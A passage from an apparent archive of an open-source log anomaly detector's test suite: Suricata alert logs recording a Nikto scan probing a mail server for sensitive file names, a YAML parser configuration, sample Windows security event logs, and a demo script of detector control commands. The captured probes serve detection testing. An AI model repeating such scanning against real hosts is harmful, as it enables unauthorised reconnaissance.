character","id":"86601","firedtimes":83,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.132261","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.616417+0000\",\"flow_id\":2152744966841157,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47102,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.UploadServlet\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.616417+0000","flow_id":"2152744966841157.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47102","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.UploadServlet","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.628183+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":84,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.133820","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.628183+0000\",\"flow_id\":486941901094842,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47104,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PWD\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.628183+0000","flow_id":"486941901094842.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47104","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PWD","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.634992+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":85,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.135357","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.634992+0000\",\"flow_id\":278614512413618,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47106,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.634992+0000","flow_id":"278614512413618.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47106","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.638121+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":86,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.136892","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.638121+0000\",\"flow_id\":2193388242384897,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47108,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.exe\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.638121+0000","flow_id":"2193388242384897.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47108","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.exe","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.641116+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":87,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.138431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.641116+0000\",\"flow_id\":1061393776952083,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47110,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.listprint\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.641116+0000","flow_id":"1061393776952083.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47110","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.listprint","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.646964+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":88,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.139982","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.646964+0000\",\"flow_id\":403035420023849,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47112,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.link\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.646964+0000","flow_id":"403035420023849.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47112","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.link","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.650090+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":89,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.141521","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.650090+0000\",\"flow_id\":303031401506644,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47114,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.650090+0000","flow_id":"303031401506644.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47114","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.653055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":90,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.143056","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.653055+0000\",\"flow_id\":2084777109418518,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47116,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.back\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.653055+0000","flow_id":"2084777109418518.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47116","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.back","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.655279+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":91,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.144597","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.655279+0000\",\"flow_id\":1361650645662792,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47118,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.password\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.655279+0000","flow_id":"1361650645662792.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47118","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.password","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.657354+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":92,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.146146","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.657354+0000\",\"flow_id\":1.24322121737965e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47120,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.657354+0000","flow_id":"1243221217379650.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47120","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.659892+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":93,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.147689","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.659892+0000\",\"flow_id\":1976543933501226,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47122,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tw\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.659892+0000","flow_id":"1976543933501226.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47122","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tw","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"}logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows.yml000066400000000000000000000073611437606560100301070ustar00rootroot00000000000000LearnMode: False Log.Encoding: 'utf-8' Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/windows_json_logs/Security_Error.log' - 'file:///tmp/windows_json_logs/Security_Working.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: '' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 2 Parser: - id: machinename type: FixedWordlistDataModelElement name: 'machinename' args: - 'N3IM1703.D03.arc.local' - id: data type: FixedWordlistDataModelElement name: 'data' args: - '' - id: index type: DecimalIntegerValueModelElement name: 'index' - id: categorynumber type: 
DecimalIntegerValueModelElement name: 'categorynumber' - id: eventid type: DecimalIntegerValueModelElement name: 'eventid' - id: entrytype type: DecimalIntegerValueModelElement name: 'entrytype' - id: source type: VariableByteDataModelElement name: 'source' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: non_empty_elem type: VariableByteDataModelElement name: 'non_empty_elem' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZüäö0123456789-_.:;&%=+$,/?%#\~()\r\n\t ' #- id: non_empty_elem # type: AnyByteDataModelElement # name: 'non_empty_elem' # #args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~Ä ' - id: empty_elem type: FixedWordlistDataModelElement name: 'empty' args: - '' - id: replacementstrings type: FirstMatchModelElement name: 'replacementstrings' args: - non_empty_elem - empty_elem - id: instanceid type: DecimalIntegerValueModelElement name: 'instanceid' - id: timegenerated type: VariableByteDataModelElement name: 'timegenerated' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: timewritten type: VariableByteDataModelElement name: 'timewritten' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: username type: FixedWordlistDataModelElement name: 'username' args: - 'NT-AUTORITÄT' - '\\' - 'SYSTEM' - 'Lokaler Dienst' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: MachineName: machinename Data: data Index: index CategoryNumber: categorynumber EventID: eventid EntryType: entrytype Source: source ReplacementStrings: - replacementstrings InstanceId: instanceid TimeGenerated: timegenerated TimeWritten: timewritten +UserName: username Site: "NULL_OBJECT" Container: "NULL_OBJECT" _empty_list: EMPTY_ARRAY _empty_object: EMPTY_OBJECT Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe json: true type: 
StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs/000077500000000000000000000000001437606560100314325ustar00rootroot00000000000000Security_Error.log000066400000000000000000000042221437606560100350360ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","C:\\Users\\admin-ea\\AppData\\Roaming\\Microsoft\\Crypto\\Keys\\de7cf8a7901d2ad13e5c67c29e5d1662_ccbe96bb-675a-4a22-b29c-5213a99e5b4f","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","\r\n\t\t%S-1-5-32-544\r\n\t\t%S-1-1-0\r\n\t\t%S-1-5-11\r\n\t\t%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} 
{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","%S-1-5-32-544%S-1-1-0%S-1-5-11%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":12293,"CategoryNumber":13826,"EventID":4799,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["Zugriffssteuerungs-Unterstützungsoperatoren","Builtin","S-1-5-32-579","S-1-5-18","N3IM1703$","D03","0x3e7","0x1680","C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"],"InstanceId":4799,"TimeGenerated":"2021-05-10T09:38:03+02:00","TimeWritten":"2021-05-10T09:38:03+02:00","UserName":null,"Site":null,"Container":null} Security_Working.log000066400000000000000000000011101437606560100353560ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} 
logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/000077500000000000000000000000001437606560100257215ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/aminerRemoteControlDemo.sh000077500000000000000000000176351437606560100330710ustar00rootroot00000000000000#removes the 'LogPrefix' sudo aminerremotecontrol --exec "change_config_property(analysis_context, 'LogPrefix', '')" #renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector' sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the current list of target_path_list sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" #adds a new path to the 'NewMatchPathValueComboDetector' component. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list', ['/model/IPAddresses/Username', '/model/IPAddresses/IP', 'new/path'])" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to True to start the learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', True)" sleep 1 #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False to end the learning phase. 
